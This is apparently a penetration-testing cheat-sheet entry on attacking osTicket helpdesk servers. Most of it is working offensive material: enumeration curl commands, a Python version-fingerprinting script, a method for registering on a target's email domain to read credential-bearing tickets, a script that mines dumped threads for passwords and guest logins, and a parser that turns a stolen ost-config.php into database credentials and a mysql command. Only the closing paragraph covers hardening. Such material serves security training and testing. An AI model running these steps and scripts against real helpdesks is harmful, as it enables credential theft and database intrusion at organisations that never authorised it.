Service bank
WEB / APP 80/tcp 443/tcp

osTicket

PHP helpdesk system. The classic attack is sensitive-data exposure: register on the client portal with an address on the target's own email domain (one you can receive mail for) and read tickets whose replies contain credentials; include/ost-config.php holds the DB creds and the secret salt.

Ports

Port   Proto   Notes
80     tcp     HTTP
443    tcp     HTTPS

Fingerprint

  • osTicket footer and version on the support pages
  • Staff control panel at /scp/login.php

Key files

Path                     Holds                                Sensitive
include/ost-config.php   DB credentials and the secret salt   yes

Default / weak creds

  • staff/agent accounts via reuse or weak passwords

Known CVEs

CVE                                    Impact
version-specific (check advisories)    file upload, SSRF and stored XSS in older releases

Exploitation primitives

  • Sensitive data exposure: with an inbox on the org's email domain, open a ticket and read the replies; internal tickets routinely leak credentials
  • Registering a client-portal account from an address on that captured domain yields a portal session
  • Attachment upload and version-specific vulnerabilities (fingerprint first)

Overview

osTicket is a support-ticket app. Its standout weakness is process, not memory corruption: tickets carry conversations, and those conversations carry secrets you can reach by registering with the right email domain.

Enumeration

Find the staff panel and version:

curl -sI http://<TARGET>/scp/login.php
curl -s http://<TARGET>/setup/doc/ -o /dev/null -w '%{http_code}\n'   # leftover /setup hints at version/misconfig
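The same three checks as a small script, added here as an example (not osTicket code and not from the original page). It assumes only that the version string appears somewhere near the word "osTicket" in the page markup; the footer in SAMPLE_HTML is constructed to show the parser working, and real installs may format it differently, so the regex is deliberately loose.

```python
"""Fingerprint an osTicket install: version string from the page HTML plus
the two tell-tale paths (/scp/login.php and a leftover /setup/).
Added example, not osTicket's own code."""
import re
import sys
import urllib.error
import urllib.request

# Constructed sample of a support-page footer (assumption: the version sits
# next to the word "osTicket" somewhere in the markup).
SAMPLE_HTML = """
<html><body>
<div id="footer">
  Copyright &copy; 2023 Example Corp. Powered by
  <a href="https://osticket.com">osTicket</a> v1.15.8
</div>
<!-- osTicket 1.15.8 -->
</body></html>
"""

# "osTicket", then up to 40 non-digit chars, then an optional "v" and x.y[.z]
VERSION_RE = re.compile(r"osTicket[^0-9]{0,40}?v?(\d+\.\d+(?:\.\d+)?)", re.I)


def extract_version(page_html):
    """Return the first osTicket-style version string in the HTML, or None."""
    m = VERSION_RE.search(page_html)
    return m.group(1) if m else None


class _NoRedirect(urllib.request.HTTPRedirectHandler):
    """Do not follow 3xx: a redirect on /setup/ is itself a signal."""

    def redirect_request(self, *args, **kwargs):
        return None


def probe(base, path, timeout=5.0):
    """(status, body) for base+path; (None, '') if the host is unreachable."""
    opener = urllib.request.build_opener(_NoRedirect)
    req = urllib.request.Request(
        base.rstrip("/") + path, headers={"User-Agent": "Mozilla/5.0"}
    )
    try:
        with opener.open(req, timeout=timeout) as r:
            return r.status, r.read().decode("utf-8", "replace")
    except urllib.error.HTTPError as e:  # 3xx/4xx/5xx still tell us the path exists
        return e.code, ""
    except (urllib.error.URLError, OSError):
        return None, ""


def fingerprint(base):
    """Collect the three enumeration signals in one pass."""
    _, home = probe(base, "/")
    scp, _ = probe(base, "/scp/login.php")
    setup, _ = probe(base, "/setup/")
    return {
        "version": extract_version(home),
        "staff_panel": scp == 200,
        # 200/301/302/403 all mean the directory was never removed; 404 means it was
        "setup_left_behind": setup in (200, 301, 302, 403),
    }


if __name__ == "__main__":
    print(fingerprint(sys.argv[1] if len(sys.argv) > 1 else "http://127.0.0.1"))
```

Run it as `python3 fp.py http://<TARGET>`; an empty `version` with `staff_panel` true usually means the version is only visible once logged into /scp, which is where the advisory lookup in the CVE table then has to start.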

Sensitive-data exposure (the classic path)

The weakness here is the workflow, not the code. If you control an inbox on the org's email domain, the ticket system hands you internal conversations:

  1. From recon, get a valid org email domain and an address on it you can receive mail for (sometimes the target box is the mail server itself).
  2. Open a ticket or register from that address, then read staff replies and internal notes; they routinely contain credentials.
  3. Watch the auto-reply for the ticket number: ticket number + email address is the guest login to the client portal, so any such pair leaked in a thread opens that ticket too.

Check the client portal for the reply:

curl -s "http://<TARGET>/view.php?id=<TICKET_ID>" -b "OSTSESSID=<cookie>"
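Reading one thread by hand is fine; triaging a dozen is not. This added example (not osTicket code, not from the original page) takes the HTML saved from a request like the one above and pulls out credential-looking lines plus the ticket-number/email pairs that double as portal logins. SAMPLE_THREAD is constructed; the only osTicket-specific assumption is that default ticket numbers are six digits, so a longer run of digits after `#` is also accepted.

```python
"""Triage a dumped osTicket thread: credential-looking lines and the
ticket-number/email pairs that serve as guest logins on the client portal.
Added example, not osTicket's own code."""
import html
import re
import sys

# Constructed sample of a saved thread page; tag names and wording are made up.
SAMPLE_THREAD = """
<div class="thread-entry"><span class="poster">svc-helpdesk@example.internal</span>
<div class="thread-body"><p>Hi Bob, your ticket #384122 is open.</p>
<p>Temporary VPN access: username bob.smith, password Summer2023!</p>
<p>Regards, IT</p></div></div>
<div class="thread-entry"><span class="poster">bob.smith@example.internal</span>
<div class="thread-body"><p>Thanks. Can you also reset the sql account?</p>
<p>jdbc:mysql://db01:3306/erp?user=erp_app&amp;password=Str0ngPass#1</p></div></div>
"""

TAG_RE = re.compile(r"<[^>]+>")
CRED_RE = re.compile(
    r"(?:password|passwd|pwd|secret|token|api[_-]?key|credentials?)\s*[:=]?\s*\S+",
    re.I,
)
TICKET_RE = re.compile(r"#(\d{6,})")  # assumption: osTicket default ticket numbers are 6 digits
EMAIL_RE = re.compile(r"[\w.+-]+@[\w-]+(?:\.[\w-]+)+")


def to_text(raw_html):
    """Crude tag stripping: every tag becomes a line break, entities are decoded."""
    text = html.unescape(TAG_RE.sub("\n", raw_html))
    return [ln.strip() for ln in text.splitlines() if ln.strip()]


def find_credentials(lines):
    """Lines that mention a password/token-like keyword followed by a value."""
    return [ln for ln in lines if CRED_RE.search(ln)]


def find_logins(lines):
    """Ticket numbers and email addresses seen in the thread; any email plus
    ticket-number pair is a candidate guest login on the client portal."""
    tickets, emails = set(), set()
    for ln in lines:
        tickets.update(TICKET_RE.findall(ln))
        emails.update(EMAIL_RE.findall(ln))
    return sorted(tickets), sorted(emails)


def triage(raw_html):
    lines = to_text(raw_html)
    tickets, emails = find_logins(lines)
    return {"credentials": find_credentials(lines), "tickets": tickets, "emails": emails}


if __name__ == "__main__":
    src = open(sys.argv[1], encoding="utf-8", errors="replace").read() if len(sys.argv) > 1 else SAMPLE_THREAD
    for key, val in triage(src).items():
        print(f"[{key}]")
        for item in val:
            print("  ", item)
```

Pipe the curl output to a file and pass it as the first argument; with no argument it runs over the constructed sample. The keyword list is intentionally broad, because a false positive costs a glance while a missed `pwd=` costs the foothold.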

Loot the config

Any file-read primitive (LFI, traversal, or a shell) gives DB creds + the secret salt. A plain HTTP fetch of the path does not help: the server executes the PHP and returns an empty body, and osTicket ships an .htaccess in include/ to deny the request anyway, so the read has to come from the file system. The fetch is still worth one request as a sanity check (expect an empty 200 or a 403, never the source):

curl -s http://<TARGET>/include/ost-config.php
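Once a copy of ost-config.php is in hand, the useful values are the `define('NAME','value')` lines. This added example (not osTicket code, not from the original page) parses them and builds a client command line; CONFIG_SAMPLE is constructed, and the constant names it uses (DBHOST, DBUSER, DBPASS, DBNAME, TABLE_PREFIX, SECRET_SALT) are the ones osTicket's config file defines. Quoting goes through shlex so a password containing a single quote still produces a command that runs.

```python
"""Pull DB credentials and the secret salt out of a captured ost-config.php.
Added example, not osTicket's own code."""
import re
import shlex
import sys

# Constructed sample in the shape of osTicket's config file (values are fake).
CONFIG_SAMPLE = r"""<?php
#Encoding
define('DBTYPE','mysql');
define('DBHOST','10.10.10.5');
define('DBNAME','osticket');
define('DBUSER','ost_user');
define('DBPASS','s3cr3t\'pw');
define('TABLE_PREFIX','ost_');
define('SECRET_SALT','f1e2d3c4b5a6');
define('ADMIN_EMAIL','admin@example.internal');
?>"""

# define('KEY','value') where value may contain escaped single quotes (\')
DEFINE_RE = re.compile(r"define\(\s*'([A-Z_]+)'\s*,\s*'((?:\\'|[^'])*)'\s*\)")


def parse_ost_config(src):
    """Map of constant name -> value with PHP's \\' escapes undone."""
    return {k: v.replace("\\'", "'") for k, v in DEFINE_RE.findall(src)}


def mysql_cmd(cfg):
    """Shell-safe mysql invocation for the parsed credentials."""
    return shlex.join([
        "mysql", "-h", cfg["DBHOST"], "-u", cfg["DBUSER"],
        "-p" + cfg["DBPASS"], cfg["DBNAME"],
    ])


def staff_table(cfg):
    """Table holding agent password hashes, with the configured prefix applied."""
    return cfg.get("TABLE_PREFIX", "ost_") + "staff"


if __name__ == "__main__":
    text = open(sys.argv[1], encoding="utf-8", errors="replace").read() if len(sys.argv) > 1 else CONFIG_SAMPLE
    cfg = parse_ost_config(text)
    print("secret salt:", cfg.get("SECRET_SALT"))
    print("staff table:", staff_table(cfg))
    print(mysql_cmd(cfg))
```

The staff table is the first stop once connected: agent accounts live there, and with the salt in hand you can also validate anything you later find in session or token storage.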

Older releases (≤ 1.14/1.15) carry attachment-upload, SSRF and stored-XSS CVEs; fingerprint the version first and check it against the advisories rather than defaulting to the email path.

Hardening

Restrict self-registration (require email verification and limit it to known domains), scope ticket visibility so internal notes never reach the client side, train staff not to paste credentials into tickets, patch promptly, and keep include/ost-config.php unreadable from the web: osTicket ships an .htaccess for include/, but it only takes effect if the web server honors overrides, so verify it with a request and deny the directory explicitly on nginx or other non-Apache setups.

References